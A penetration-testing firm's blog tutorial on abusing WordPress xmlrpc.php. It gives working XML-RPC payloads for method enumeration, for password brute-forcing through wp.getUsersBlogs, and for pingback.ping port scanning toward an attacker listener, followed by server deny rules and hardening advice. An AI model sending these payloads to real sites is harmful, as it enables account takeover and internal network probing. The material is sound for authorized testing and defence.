RedOps Security
  • Home
  • Services
  • About
  • Case Studies
  • Blogs
  • Get Free Audit
Get Free Audit
RedOps Security

Securing your digital frontiers with elite intelligence.

Quick Links
  • Home
  • Services Overview
  • About Us
  • Blogs
  • Contact
Our Services
  • Network VAPT
  • Mobile App Security
  • Web App Security
  • Cloud Security
  • Red Teaming
  • GRC & Compliance
  • ISO 27001
  • Secure Development
Connect
  • LinkedIn
  • X (Twitter)
  • GitHub
Get a Quote
© 2026 RedOps Security. All rights reserved.
Privacy PolicyTerms of ServiceResponsible Disclosure
All Research
Vulnerabilities

Wordpress xmlrpc.php -common vulnerabilites & how to exploit them

You might have seen a /xmlrpc.php file in many wordpress sites you visit , you might have even tried to search the error(XML-RPC server accepts POST requests only) that appears when you visit http://site.com/wp/xmlrpc.php.In this post I’ll try to highlight the common vulnerabilities associated with the xmlrpc.php file.

May 11, 20264 min readArjun Shaji
Contents
  1. Step 1 — Access xmlrpc.php
  2. Step 2 — Intercept the Request
  3. Step 3 — Enumerate Available Methods
  4. Important Methods to Look For
  5. Username Enumeration
  6. Using Burp Intruder
  7. Important Note
  8. Step 1 — Verify Method Availability
  9. Step 2 — Start a Listener
  10. Step 3 — Send the pingback Request
  11. Interpreting Responses
  12. Disable XML-RPC (If Not Needed)
  13. Use Security Plugins
  14. Restrict Login Attempts
  15. Keep WordPress Updated

What is XML-RPC?

XML-RPC on WordPress is an API (“Application Programming Interface”) that allows external applications and services to communicate with a WordPress website.

It enables developers to build mobile apps, desktop apps, and third-party services that can interact with WordPress remotely.

Using XML-RPC, applications can perform actions such as:

  • Publish posts
  • Edit posts
  • Delete posts
  • Upload files (images, media, etc.)
  • Retrieve comments
  • Edit comments

The XML-RPC endpoint is usually located at:

http://targetwebsite.com/xmlrpc.php

Common Vulnerabilities in XML-RPC

The most common security issues associated with XML-RPC are:

  • Brute-force login attacks
  • Username enumeration
  • DDoS amplification
  • XSPA (Cross-Site Port Attacks) / Internal port scanning using pingbacks

Brute Force Attack via XML-RPC

Step 1 — Access xmlrpc.php

Visit:

http://targetwebsite.com/xmlrpc.php

You will usually see a message like:

XML-RPC server accepts POST requests only.

Step 2 — Intercept the Request

Use a proxy tool such as:

  • Burp Suite
  • OWASP ZAP

Capture and resend the request.

Step 3 — Enumerate Available Methods

Send a POST request with the following XML payload:

<methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
</methodCall>

This returns a list of all available XML-RPC methods.

Important Methods to Look For

Search the response for:

  • wp.getUsersBlogs
  • wp.getCategories
  • metaWeblog.getUsersBlogs

If these methods are enabled, brute-force attacks may be possible.

Performing a Brute Force Attack

Send the following POST request:

<methodCall>
    <methodName>wp.getUsersBlogs</methodName>
    <params>
        <param>
            <value>admin</value>
        </param>
        <param>
            <value>password123</value>
        </param>
    </params>
</methodCall>

Replace:

  • admin → target username
  • password123 → password guess

Username Enumeration

Finding valid usernames significantly improves attack success rates.

Common tools:

  • WPScan
  • Manual author enumeration
  • RSS feed leaks

Example:

wpscan --url http://targetwebsite.com --enumerate u

Using Burp Intruder

Load the request into Burp Intruder and automate password attempts.

Important Note

Both valid and invalid logins usually return:

HTTP/1.1 200 OK

You must distinguish successful logins by:

  • Response length
  • Response body differences
  • Presence of blog information

XSPA / Internal Port Scanning Using pingback.ping

Some WordPress installations expose the method:

pingback.ping

This can sometimes be abused for internal network scanning.

Step 1 — Verify Method Availability

Use:

<methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
</methodCall>

Search for:

pingback.ping

Step 2 — Start a Listener

You can use:

  • Netcat
  • Python HTTP server
  • Node.js HTTP server
  • Apache/Nginx logs

Example:

python3 -m http.server 8000

Step 3 — Send the pingback Request

<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param>
            <value>
                <string>http://YOUR-SERVER:8000</string>
            </value>
        </param>

        <param>
            <value>
                <string>http://targetwebsite.com/sample-post</string>
            </value>
        </param>
    </params>
</methodCall>

Replace:

  1. YOUR-SERVER:8000 → your listener
  2. sample-post → a valid WordPress post URL

Interpreting Responses

If the response contains something like:

<value><int>17</int></value>

and the value is greater than 0, it may indicate:

  • The port is reachable/open
  • The pingback request succeeded

You can confirm this by checking your listener logs.

Security Recommendations

To secure WordPress against XML-RPC abuse:

Disable XML-RPC (If Not Needed)

Apache:

<Files xmlrpc.php>
    Order Deny,Allow
    Deny from all
</Files>

Nginx:

location = /xmlrpc.php {
    deny all;
}

Use Security Plugins

Examples:

  • Wordfence
  • Sucuri
  • iThemes Security

Restrict Login Attempts

Implement:

  • Rate limiting
  • CAPTCHA
  • Fail2Ban
  • WAF protections

Keep WordPress Updated

Always update:

  • WordPress core
  • Plugins
  • Themes

Disclaimer

This information is intended for:

  • Authorized penetration testing
  • Security research
  • Defensive security assessments

Do not test systems without explicit permission.

Author

Arjun Shaji

Practitioner-written offensive security research from RedOps Security.

Discuss an assessment